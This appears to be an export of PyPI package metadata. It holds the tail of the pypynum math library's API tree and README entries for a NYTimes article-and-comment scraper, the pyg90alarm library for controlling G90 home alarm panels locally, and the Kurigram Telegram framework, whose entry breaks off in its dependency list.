│ ├── cauchy_pdf(x: Any, x0: Any, gamma: Any) -> Any
│ ├── chi2_cdf(x: Any, df: Any) -> Any
│ ├── chi2_pdf(x: Any, df: Any) -> Any
│ ├── expon_cdf(x: Any, scale: Any) -> Any
│ ├── expon_pdf(x: Any, scale: Any) -> Any
│ ├── f_pdf(x: Any, dfnum: Any, dfden: Any) -> Any
│ ├── gamma_pdf(x: Any, shape: Any, scale: Any) -> Any
│ ├── geometric_pmf(k: Any, p: Any) -> Any
│ ├── hypergeom_pmf(k: Any, mg: Any, n: Any, nt: Any) -> Any
│ ├── invgauss_pdf(x: Any, mu: Any, lambda_: Any, alpha: Any) -> Any
│ ├── levy_pdf(x: Any, c: Any) -> Any
│ ├── log_logistic_cdf(x: Any, alpha: Any, beta: Any) -> Any
│ ├── log_logistic_pdf(x: Any, alpha: Any, beta: Any) -> Any
│ ├── logistic_cdf(x: Any, mu: Any, s: Any) -> Any
│ ├── logistic_pdf(x: Any, mu: Any, s: Any) -> Any
│ ├── lognorm_cdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── lognorm_pdf(x: Any, s: Any, scale: Any) -> Any
│ ├── logser_pmf(k: Any, p: Any) -> Any
│ ├── multinomial_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── nbinom_pmf(k: Any, n: Any, p: Any) -> Any
│ ├── nhypergeom_pmf(k: Any, m: Any, n: Any, r: Any) -> Any
│ ├── normal_cdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── normal_pdf(x: Any, mu: Any, sigma: Any) -> Any
│ ├── pareto_pdf(x: Any, k: Any, m: Any) -> Any
│ ├── poisson_pmf(k: Any, mu: Any) -> Any
│ ├── rayleigh_pdf(x: Any, sigma: Any) -> Any
│ ├── t_pdf(x: Any, df: Any) -> Any
│ ├── uniform_cdf(x: Any, loc: Any, scale: Any) -> Any
│ ├── uniform_pdf(x: Any, loc: Any, scale: Any) -> Any
│ ├── vonmises_pdf(x: Any, mu: Any, kappa: Any) -> Any
│ ├── weibull_max_pdf(x: Any, c: Any, scale: Any, loc: Any) -> Any
│ ├── weibull_min_pdf(x: Any, c: Any, scale: Any, loc: Any) -> Any
│ └── zipf_pmf(k: Any, s: Any, n: Any) -> Any
├── equations
│ ├── CLASS
│ └── FUNCTION
│ ├── lin_eq(left: list, right: list) -> list
│ └── poly_eq(coefficients: list) -> list
├── fft
│ ├── CLASS
│ │ └── FT1D(object)/__init__(self: Any, data: Any) -> Any
│ └── FUNCTION
├── files
│ ├── CLASS
│ └── FUNCTION
│ ├── read(file: str) -> list
│ └── write(file: str, cls: object) -> Any
├── geoms
│ ├── CLASS
│ │ ├── Circle(object)/__init__(self: Any, center: typing.Union[list, tuple], radius: typing.Union[int, float]) -> Any
│ │ ├── Line(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> Any
│ │ ├── Point(object)/__init__(self: Any, p: typing.Union[list, tuple]) -> Any
│ │ ├── Polygon(object)/__init__(self: Any, p: typing.Union[list, tuple]) -> Any
│ │ ├── Quadrilateral(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple], c: typing.Union[list, tuple], d: typing.Union[list, tuple]) -> Any
│ │ └── Triangle(object)/__init__(self: Any, a: typing.Union[list, tuple], b: typing.Union[list, tuple], c: typing.Union[list, tuple]) -> Any
│ └── FUNCTION
│ └── distance(g1: Any, g2: Any, error: typing.Union[int, float]) -> float
├── graphs
│ ├── CLASS
│ │ ├── BaseGraph(object)/__init__(self: Any) -> Any
│ │ ├── BaseWeGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── DiGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── UnGraph(pypynum.graphs.BaseGraph)/__init__(self: Any) -> Any
│ │ ├── WeDiGraph(pypynum.graphs.BaseWeGraph)/__init__(self: Any) -> Any
│ │ └── WeUnGraph(pypynum.graphs.BaseWeGraph)/__init__(self: Any) -> Any
│ └── FUNCTION
├── groups
│ ├── CLASS
│ │ └── Group(object)/__init__(self: Any, data: Any, operation: Any) -> Any
│ └── FUNCTION
│ └── group(data: Any, operation: Any) -> Any
├── hypcmpnms
│ ├── CLASS
│ │ ├── Euler(object)/__init__(self: Any, y: typing.Union[int, float], p: typing.Union[int, float], r: typing.Union[int, float]) -> Any
│ │ ├── Octonion(object)/__init__(self: Any, s: typing.Union[int, float], t: typing.Union[int, float], u: typing.Union[int, float], v: typing.Union[int, float], w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> Any
│ │ └── Quaternion(object)/__init__(self: Any, w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> Any
│ └── FUNCTION
│ ├── convert(data: typing.Union[pypynum.hypcmpnms.Quaternion, pypynum.matrices.Matrix, pypynum.hypcmpnms.Euler], to: str) -> typing.Union[pypynum.hypcmpnms.Quaternion, pypynum.matrices.Matrix, pypynum.hypcmpnms.Euler]
│ ├── euler(yaw: typing.Union[int, float], pitch: typing.Union[int, float], roll: typing.Union[int, float]) -> pypynum.hypcmpnms.Euler
│ ├── octo(s: typing.Union[int, float], t: typing.Union[int, float], u: typing.Union[int, float], v: typing.Union[int, float], w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> pypynum.hypcmpnms.Octonion
│ └── quat(w: typing.Union[int, float], x: typing.Union[int, float], y: typing.Union[int, float], z: typing.Union[int, float]) -> pypynum.hypcmpnms.Quaternion
├── images
│ ├── CLASS
│ │ ├── BMP(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ │ ├── BaseImage(object)/__init__(self: Any) -> None
│ │ ├── JPEG(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ │ └── PNG(pypynum.images.BaseImage)/__init__(self: Any) -> None
│ └── FUNCTION
│ ├── entropy(data: typing.Any) -> float
│ ├── jpeg_adjust_qtable(qtable: typing.Union[list, tuple], quality: int) -> list
│ ├── jpeg_category(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_channel_encoding(matrix: list, quality: int, mode: int) -> tuple
│ ├── jpeg_chroma_dc_huff(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_dct8x8(block: typing.Union[list, tuple], reverse: bool) -> list
│ ├── jpeg_decode_pixels(scan_data: bytes, lqtable: list, cqtable: list, width: int, height: int) -> list
│ ├── jpeg_encode_pixels(pixels: typing.Union[list, tuple], quality: int) -> tuple
│ ├── jpeg_luma_dc_huff(data: typing.Any, reverse: bool) -> typing.Any
│ ├── jpeg_rle_decoding(sequence: typing.Union[list, tuple]) -> list
│ ├── jpeg_rle_encoding(sequence: typing.Union[list, tuple]) -> list
│ ├── jpeg_split_pixels(matrix: list) -> list
│ ├── jpeg_zigzag(data: typing.Union[list, tuple], reverse: bool) -> list
│ ├── png_apply_filter(pixels: list, above_pixels: list, filter_type: int) -> list
│ ├── png_reverse_filter(pixels: list, above_pixels: list, filter_type: int) -> list
│ ├── rgb2ycbcr(weights: typing.Union[list, tuple]) -> tuple
│ └── ycbcr2rgb(weights: typing.Union[list, tuple]) -> tuple
├── interp
│ ├── CLASS
│ └── FUNCTION
│ ├── bicubic(x: Any) -> Any
│ ├── contribute(src: Any, x: Any, y: Any, channels: Any) -> Any
│ ├── interp1d(data: typing.Union[list, tuple], length: int) -> list
│ └── interp2d(src: Any, new_height: Any, new_width: Any, channels: Any, round_res: Any, min_val: Any, max_val: Any) -> Any
├── kernels
│ ├── CLASS
│ └── FUNCTION
│ ├── det2x2kernel(a: typing.Union[list, tuple]) -> float
│ ├── det3x3kernel(a: typing.Union[list, tuple]) -> float
│ ├── det4x4kernel(a: typing.Union[list, tuple]) -> float
│ ├── eigen2x2kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── inv2x2kernel(a: typing.Union[list, tuple]) -> list
│ ├── inv3x3kernel(a: typing.Union[list, tuple]) -> list
│ ├── inv4x4kernel(a: typing.Union[list, tuple]) -> list
│ ├── lu2x2kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── lu3x3kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── lu4x4kernel(a: typing.Union[list, tuple]) -> tuple
│ ├── matexp2x2kernel(a: typing.Union[list, tuple]) -> list
│ ├── matmul2x2kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul3x3kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul4x4kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ ├── matmul8x8kernel(a: typing.Union[list, tuple], b: typing.Union[list, tuple]) -> list
│ └── matpow2x2kernel(a: typing.Union[list, tuple], n: typing.Union[int, float, complex]) -> list
├── logics
│ ├── CLASS
│ │ ├── AND(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── Basic(object)/__init__(self: Any, label: Any) -> Any
│ │ ├── Binary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── COMP(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── DFF(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any, state: Any) -> Any
│ │ ├── FullAdder(pypynum.logics.Ternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── FullSuber(pypynum.logics.Ternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── HalfAdder(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── HalfSuber(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── JKFF(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, state: Any) -> Any
│ │ ├── NAND(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── NOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── NOT(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any) -> Any
│ │ ├── OR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ ├── Quaternary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── TFF(pypynum.logics.Unary)/__init__(self: Any, label: Any, pin0: Any, state: Any) -> Any
│ │ ├── Ternary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any) -> Any
│ │ ├── TwoBDiver(pypynum.logics.Quaternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── TwoBMuler(pypynum.logics.Quaternary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any, pin2: Any, pin3: Any) -> Any
│ │ ├── Unary(pypynum.logics.Basic)/__init__(self: Any, label: Any, pin0: Any) -> Any
│ │ ├── XNOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ │ └── XOR(pypynum.logics.Binary)/__init__(self: Any, label: Any, pin0: Any, pin1: Any) -> Any
│ └── FUNCTION
│ └── connector(previous: Any, latter: Any) -> Any
├── maths
│ ├── CLASS
│ └── FUNCTION
│ ├── acos(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acosh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acot(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acoth(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acsc(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── acsch(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── arrangement(n: int, r: int) -> int
│ ├── asec(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asech(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asin(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── asinh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── atan(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── atanh(x: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── average(data: typing.Union[list, tuple], weights: typing.Union[list, tuple]) -> float
│ ├── beta(p: typing.Union[int, float], q: typing.Union[int, float]) -> typing.Union[int, float]
│ ├── central_moment(data: typing.Union[list, tuple], order: int) -> float
│ ├── coeff_det(x: typing.Union[list, tuple], y: typing.Union[list, tuple]) -> typing.Union[int, float, complex]
│ ├── combination(n: int, r: int) -> int
│ ├── corr_coeff(x: typing.Union[list, tuple], y: typing.Union[list, tuple]) -> typing.Union[int, float, complex]
│ ├── cos(x: t | text/markdown | Shen Jiayi | 2261748025@qq.com | null | null | AGPLv3 | math, 数学, mathematics, 数学计算, numerical, 数值, computation, 计算, scientific, 科学, algebra, 代数, calculus, 微积分, statistics, 统计, linear-algebra, 线性代数, optimization, 优化, numerical-analysis, 数值分析, matrix, 矩阵, vector, 向量, tensor, 张量, numerics, 数值计算, library, 库, tools, 工具, utils, 实用程序, algorithms, 算法, software, 软件, package, 包, methods, 方法, data-science, 数据科学, machine-learning, 机器学习, computational, 计算的, operations, 操作, functions, 函数, processing, 处理, programming, 编程, simulation, 仿真, visualization, 可视化, physics, 物理 | [] | [] | https://github.com/PythonSJL/PyPyNum | null | >=3.5 | [] | [] | [] | [] | [] | [] | [] | [] | twine/6.2.0 CPython/3.12.10 | 2026-02-20T09:36:34.405338 | pypynum-1.18.0.tar.gz | 178,608 | 75/4e/dbdd9f0c4e487183bf9011dfaa2dd64328575016bff98cf2446441ab8296/pypynum-1.18.0.tar.gz | source | sdist | null | false | 3f2aad616369697b66c90e24b18d47a6 | 1ef637b97bcc57d33d5984f0e69a274db14d34c9366841d455d5f40065c56c4d | 754edbdd9f0c4e487183bf9011dfaa2dd64328575016bff98cf2446441ab8296 | null | [] | 0 |
2.4 | nytimes-scraper-fork | 1.1.3.dev4 | Scrape article metadata and comments from NYTimes | # nytimes-scraper
[](https://pypi.org/project/nytimes-scraper/)
Scrape article metadata and comments from NYTimes
## Setup
```bash
pip install nytimes-scraper
```
## CLI usage
The scraper will automatically fetch every article and all the user comments published on
[nytimes.com](https://www.nytimes.com/).
Articles are processed month by month, starting with the current month.
For each month, a `{year}-{month}-articles.pickle` and `{year}-{month}-comments.pickle` will be
generated in the current directory.
If the process is restarted, existing outputs will not be overwritten and the scraper will continue
at the month where it left off.
To use it, run
```bash
python -m nytimes_scraper <API_KEY>
```
## Programmatic usage
The scraper can also be started programmatically:
```python
import datetime as dt
from nytimes_scraper import run_scraper, scrape_month
# scrape february of 2020
article_df, comment_df = scrape_month('<your_api_key>', date=dt.date(2020, 2, 1))
# scrape all articles month by month
run_scraper('<your_api_key>')
```
Alternatively, the `nytimes_scraper.articles` and `nytimes_scraper.comments` modules can be used for more
fine-grained access:
```python
import datetime as dt
from nytimes_scraper.nyt_api import NytApi
from nytimes_scraper.articles import fetch_articles_by_month, articles_to_df
from nytimes_scraper.comments import fetch_comments, fetch_comments_by_article, comments_to_df
api = NytApi('<your_api_key>')
# Fetch articles of a specific month
articles = fetch_articles_by_month(api, dt.date(2020, 2, 1))
article_df = articles_to_df(articles)
# Fetch comments from multiple articles
# a) using the results of a previous article query
article_ids_and_urls = list(article_df['web_url'].items())  # Series.iteritems() was removed in pandas 2.0
comments_a = fetch_comments(api, article_ids_and_urls)
comment_df = comments_to_df(comments_a)
# b) using a custom list of articles
comments_b = fetch_comments(api, article_ids_and_urls=[
('nyt://article/316ef65c-7021-5755-885c-a9e1ef2cfdf2', 'https://www.nytimes.com/2020/01/03/world/middleeast/trump-iran-suleimani.html'),
('nyt://article/b2d1b802-412e-51f7-8864-efc931e87bb3', 'https://www.nytimes.com/2020/01/04/opinion/impeachment-witnesses.html'),
])
# Fetch comments for one specific article by its URL
comments_c = fetch_comments_by_article(api, 'https://www.nytimes.com/2019/11/30/opinion/sunday/bernie-sanders.html')
```
| text/markdown | Tim Pietz | tim@pietz.me | null | null | MIT | null | [
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8"
] | [] | https://github.com/ietz/nytimes-scraper | null | null | [] | [] | [] | [
"cssselect",
"fire",
"lxml",
"requests",
"tqdm"
] | [] | [] | [] | [] | twine/6.2.0 CPython/3.13.1 | 2026-02-20T09:36:22.346685 | nytimes_scraper_fork-1.1.3.dev4.tar.gz | 6,404 | e3/ca/be2e4b4f29c947064b7b6bf26cbf1854bf0acf4f9a56d7e5faa6ca38e23e/nytimes_scraper_fork-1.1.3.dev4.tar.gz | source | sdist | null | false | 01ca6c2fa8ee92239211f308e1098657 | 52134d62414cb5b8f54fddd38242ea20701f20509a42659e2a759e754660ea2c | e3cabe2e4b4f29c947064b7b6bf26cbf1854bf0acf4f9a56d7e5faa6ca38e23e | null | [] | 197 |
2.4 | pyg90alarm | 2.7.3 | G90 Alarm system protocol | .. image:: https://github.com/hostcc/pyg90alarm/actions/workflows/main.yml/badge.svg?branch=master
:target: https://github.com/hostcc/pyg90alarm/tree/master
:alt: Github workflow status
.. image:: https://readthedocs.org/projects/pyg90alarm/badge/?version=stable
:target: https://pyg90alarm.readthedocs.io/en/stable
:alt: ReadTheDocs status
.. image:: https://img.shields.io/github/v/release/hostcc/pyg90alarm
:target: https://github.com/hostcc/pyg90alarm/releases/latest
:alt: Latest GitHub release
.. image:: https://img.shields.io/pypi/v/pyg90alarm
:target: https://pypi.org/project/pyg90alarm/
:alt: Latest PyPI version
Description
===========
Python package to control G90-based alarm systems.
Many manufacturers sell such systems under different brands - Golden Security,
PST, Kerui and others. These are cheap low-end systems, typically equipped with
WiFi and possibly GSM interfaces for connectivity, and support a range of
peripherals:
* Wired and wireless sensors
* Relays (switches)
... and probably others
The package implements asynchronous I/O over most of code paths using
`asyncio <https://docs.python.org/3/library/asyncio.html>`_.
Disclaimer
==========
The author has no affiliation or any relationship to any of the hardware
vendors in question. The code has been created upon many trial and error
iterations.
Motivation
==========
The primary motivation for creating the code is the comfort of using the
security system - the mobile application provided by the vendor, called
"Carener", is slow and sometimes crashes. Instead, it would be awesome to have
the system
integrated into larger ecosystems, like Home Assistant, HomeKit and such.
Hence, the code has been created to interact with the security system using
Python, and it opens up a way for further integrations.
Supported hardware
==================
It might not be possible to list every system supported by the package due to
manufacturers naming the products differently. Here is the list of hardware
known to work with the package:
* `PST G90B Plus <http://www.cameralarms.com/products/auto_dial_alarm_system/185.html>`_
As for the sensors, the list below is likely incomplete - the actual set of
supported devices should be notably larger, since many other manufacturers
produce similar items. The names in parentheses are taken from the alarm
system documentation, for example, `Home Alarm GB90-Plus <https://archive.org/details/HomeAlarmGB90-Plus/G90B%20plus%20WIFIGSMGPRS%20alarm%20system%20user%20manual/page/n7/mode/2up>`_.
* Wired PIR sensors
* Wireless PIR sensors (WPD01, WMS08)
* Door/window sensors (WDS07, WRDS01)
* Water leak sensors (LSTC01)
* Smoke sensors (WSD02)
* Gas sensors (WGD01)
* Switches/relays (JDQ)
Basically, the alarm system uses 433 MHz communication with its wireless
devices, using the EV1527 and PT2262 protocols. The mobile application also
mentions some devices using 2.4 GHz, although details of those protocols
haven't been identified, as no such hardware has been available for
experimentation.
Known caveats
=============
* Wireless shutter sensor (WRDS01) doesn't send anything on sensor closed, only
when opened. In contrast, WDS07 wireless door sensor does both.
* Wireless relays (at least JDQ) use the same RF code for switching on and
  off when configured in toggle mode. That means an RF signal repeater will
  make controlling such relays unpredictable, since the code will be sent more
  than once.
* Low battery notifications for wireless sensors (at least for WDS07 and WSD02)
  are often missing, either because the sensors don't send them or because the
  device doesn't receive them.
* Wired sensors toggle on line state change, i.e. they aren't limited to
  normally closed (NC) or normally open (NO) contacts only. They are best used
  with NC contact sensors, though, since an intruder cutting the line will then
  trigger the alarm.
Device notifications
====================
Local notifications
-------------------
There is a hidden device capability to send protocol notifications over the
WiFi interface, thus called local. The notifications are done using broadcast UDP packets with source/destination ports being ``45000:12901`` (non-configurable), and sent when the device has IP address of its WiFi interface set to ``10.10.10.250``. That is the same IP the device will allocate to the WiFi interface when AP (access point is enabled). Please note enabling the AP *is not* required for the notifications to be sent, only the IP address matters. Likely the firmware does a check internally and enables those when corresponding IP address is found on the WiFi interface.
Depending on your network setup, ensuring the `10.10.10.250` IP address is
allocated to the WiFi interface of the device might be as simple as DHCP
reservation. Please check the documentation of your networking gear on how to
set the IP address allocation up.
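As an illustration of receiving the broadcast transport only (the
``NotificationReceiver`` class below is made up for the example and is not
part of the package's API - the package handles this internally; parsing the
G90 payload is out of scope here), the UDP notifications could be listened for
with a plain ``asyncio`` datagram endpoint:

.. code:: python

   import asyncio

   class NotificationReceiver(asyncio.DatagramProtocol):
       # Collects raw datagrams; payload parsing intentionally omitted
       def __init__(self):
           self.packets = []

       def datagram_received(self, data, addr):
           self.packets.append((addr, data))

   async def listen():
       loop = asyncio.get_running_loop()
       # Port 12901 is the destination port of the broadcasts mentioned above
       await loop.create_datagram_endpoint(
           NotificationReceiver, local_addr=('0.0.0.0', 12901)
       )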
.. note:: Since the IP address trick above isn't something the device exposes
to the user, the functionality might change or even cease functioning upon a
firmware upgrade!
.. note:: The device notifications in question are fully local with no
dependency on the cloud or Internet connection on the device.
.. note:: If the IP address trick doesn't work for you for some reason, the
   package will still be able to perform the key functions - for example,
   arming or disarming the panel, or reading the list of sensors. However, the
   sensor status will not be reflected and the sensors will always be reported
   as inactive, since there is no way to read their state in a polled manner.
   To work around that limitation, the package supports simulating device
   notifications by periodically polling the history the panel records - the
   simulation works only for alerts, not notifications (notifications include,
   for example, low battery events and the like). This also requires the
   particular alert to be enabled in the mobile application, otherwise it
   won't be recorded in the history.
For local notifications to be enabled, ``G90Alarm.use_local_notifications()``
needs to be called after constructing an instance of the ``G90Alarm`` class,
followed by ``G90Alarm.listen_notifications()`` to start processing the
notifications coming from the panel. The code fragment below demonstrates
that, though it is incomplete, since callbacks (e.g.
``G90Alarm.on_armdisarm()``) should be set for the actual processing of the
notifications.
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='10.10.10.250')
# Enable local notifications
await alarm.use_local_notifications()
# Start listening for notifications
await alarm.listen_notifications()
Cloud notifications
-------------------
The cloud protocol is native to the panel and is used to interact with the
mobile application. The package can mimic the cloud server and interpret the
messages the panel sends to the cloud, allowing it to receive the
notifications and alerts.

While the protocol also allows sending commands to the panel, that is not
implemented - the local protocol is still used for sending commands even when
cloud notifications are in use.

The cloud protocol is TCP based, and the panel typically interacts with the
cloud service at a known IP address and port, which can be customized. To
process the cloud notifications, all traffic from the panel towards the
configured service address needs to be received by the node where the package
is running.
Please see
`the section <docs/cloud-protocol.rst>`_ for further details on the protocol.
The benefit of the cloud notifications is that the panel is no longer
required to have the ``10.10.10.250`` IP address.
The package could act as:
- Standalone cloud server, with no Internet connectivity or cloud service
  required at all - good if you'd like to avoid involving the vendor service.
  Please note the mobile application will show the panel as offline in this
  mode.
- Chained cloud server, where in addition to interpreting the notifications it
  also forwards all packets received from the panel to the real cloud server
  and passes the responses back to the panel. This allows the notifications to
  be processed by the package while the mobile application keeps working.

The code fragments below demonstrate both modes - please note they are
incomplete, since no callbacks are set to process the notifications.
**Standalone mode**
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='<panel IP address>')
# Configure cloud server address the panel should use - the host running the
# package.
await alarm.set_cloud_server_address(
cloud_ip='<host IP address running the package>', cloud_port=5678
)
# Enable cloud notifications
await alarm.use_cloud_notifications(
# The host/port the package will listen on for the cloud notifications,
# should match ones above.
cloud_ip='<host IP address running the package>',
cloud_port=5678,
cloud_local_port=5678,
upstream_host=None
)
# Start listening for notifications
await alarm.listen_notifications()
**Chained mode**
.. code:: python
from pyg90alarm import G90Alarm
# Create an instance of the alarm panel
alarm = G90Alarm(host='<panel IP address>')
# Configure cloud server address the panel should use - the host running the
# package.
await alarm.set_cloud_server_address(
cloud_ip='<host IP address running the package>', cloud_port=5678
)
# Enable cloud notifications
await alarm.use_cloud_notifications(
# The host/port the package will listen on for the cloud notifications,
# should match ones above.
cloud_ip='<host IP address running the package>',
cloud_port=5678,
cloud_local_port=5678,
# Upstream cloud server address the package should forward the
# notifications to.
upstream_host='47.88.7.61',
upstream_port=5678
)
# Start listening for notifications
await alarm.listen_notifications()
Quick start
===========
.. code:: shell
pip install pyg90alarm
Documentation
=============
Please see `online documentation <https://pyg90alarm.readthedocs.io>`_ for
details on the protocol, its security, supported commands and the API package
provides.
| text/x-rst | Ilia Sotnikov | hostcc@gmail.com | null | null | null | g90, alarm, protocol | [
"Development Status :: 4 - Beta",
"Intended Audience :: Developers",
"Topic :: Software Development :: Libraries :: Python Modules",
"Topic :: Home Automation",
"Topic :: System :: Hardware",
"License :: OSI Approved :: MIT License",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3 :: Only"
] | [] | https://github.com/hostcc/pyg90alarm | null | <4,>=3.9 | [] | [] | [] | [
"check-manifest; extra == \"dev\"",
"coverage; extra == \"test\"",
"asynctest; extra == \"test\"",
"sphinx; extra == \"docs\"",
"sphinx-rtd-theme; extra == \"docs\""
] | [] | [] | [] | [
"Bug Reports, https://github.com/hostcc/pyg90alarm/issues",
"Source, https://github.com/hostcc/pyg90alarm/"
] | twine/6.1.0 CPython/3.13.7 | 2026-02-20T09:36:18.758338 | pyg90alarm-2.7.3.tar.gz | 121,106 | 93/88/e70759bcfa283baad11e9d4278fa0f860f6b8b78b630167361a5f97a3fac/pyg90alarm-2.7.3.tar.gz | source | sdist | null | false | a0a3ec914d264e19f0295ac4cad2513b | fa4653e4f760fa632fd86b2771f4430e2ddf21bb45069db4607c8602fe703793 | 9388e70759bcfa283baad11e9d4278fa0f860f6b8b78b630167361a5f97a3fac | null | [
"LICENSE"
] | 273 |
2.4 | Kurigram | 2.2.19 | Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots | <p align="center">
<a href="https://github.com/KurimuzonAkuma/pyrogram">
<img src="https://raw.githubusercontent.com/KurimuzonAkuma/kurigramartwork/master/kurigram-logo.png" alt="Pyrogram" width="128">
</a>
<br>
<b>Telegram MTProto API Framework for Python</b>
<br>
<a href="https://kurigram.icu">
Homepage
</a>
•
<a href="https://docs.kurigram.icu">
Documentation
</a>
•
<a href="https://t.me/kurigram_news">
News
</a>
•
<a href="https://t.me/kurigram_chat">
Chat
</a>
</p>
## Pyrogram
> Elegant, modern and asynchronous Telegram MTProto API framework in Python for users and bots
``` python
from pyrogram import Client, filters
app = Client("my_account")
@app.on_message(filters.private)
async def hello(client, message):
await message.reply("Hello from Pyrogram!")
app.run()
```
**Pyrogram** is a modern, elegant and asynchronous [MTProto API](https://docs.kurigram.icu/topics/mtproto-vs-botapi)
framework. It enables you to easily interact with the main Telegram API through a user account (custom client) or a bot
identity (bot API alternative) using Python.
### Support
If you'd like to support my fork, you can consider:
- `kurimuzonakuma.ton` - TON
- `TCbZ7CSpTvTJ6rno2eoWWYBx7hmYF75wk3` - USDT TRC20
### Key Features
- **Ready**: Install Pyrogram with pip and start building your applications right away.
- **Easy**: Makes the Telegram API simple and intuitive, while still allowing advanced usages.
- **Elegant**: Low-level details are abstracted and re-presented in a more convenient way.
- **Fast**: Boosted up by [TgCrypto](https://github.com/pyrogram/tgcrypto), a high-performance cryptography library written in C.
- **Type-hinted**: Types and methods are all type-hinted, enabling excellent editor support.
- **Async**: Fully asynchronous (also usable synchronously if wanted, for convenience).
- **Powerful**: Full access to Telegram's API to execute any official client action and more.
### Installing
Stable version
``` bash
pip3 install kurigram
```
Dev version
``` bash
pip3 install https://github.com/KurimuzonAkuma/kurigram/archive/dev.zip --force-reinstall
```
### Resources
- Check out the [docs](https://docs.kurigram.icu) to learn more about Pyrogram, get started right
away and discover more in-depth material for building your client applications.
- Join the [official channel](https://t.me/kurigram_news) and stay tuned for news, updates and announcements.
- Join the [official chat](https://t.me/kurigram_chat) to communicate with people.
| text/markdown | null | Dan <dan@pyrogram.org> | KurimuzonAkuma | null | null | api, chat, client, library, messenger, mtproto, python, telegram | [
"Development Status :: 5 - Production/Stable",
"Intended Audience :: Developers",
"License :: OSI Approved :: GNU Lesser General Public License v3 (LGPLv3)",
"Natural Language :: English",
"Operating System :: OS Independent",
"Programming Language :: Python",
"Programming Language :: Python :: 3",
"Programming Language :: Python :: 3.8",
"Programming Language :: Python :: 3.9",
"Programming Language :: Python :: 3.10",
"Programming Language :: Python :: 3.11",
"Programming Language :: Python :: 3.12",
"Programming Language :: Python :: 3.13",
"Programming Language :: Python :: 3.14",
"Programming Language :: Python :: Implementation",
"Programming Language :: Python :: Implementation :: CPython",
"Programming Language :: Python :: Implementation :: PyPy",
"Topic :: Communications",
"Topic :: Communications :: Chat",
"Topic :: Internet",
"Topic :: Software Development :: Libraries",
"Topic :: Software Development :: Libraries :: Application Frameworks",
"Topic :: Software Development :: Libraries :: Python Modules"
] | [] | null | null | >=3.8 | [] | [] | [] | [
"pyaes<=1.6.1",
"pysocks<=1.7.1",
"hatch<=1.16.2; extra == \"dev\"",
"keyring<=25.7.0; extra == \"dev\"",
"pytest-asyncio<=1.3.0; extra == \"dev\"",
"pytest-cov<=7.0.0; extra == \"dev\"",
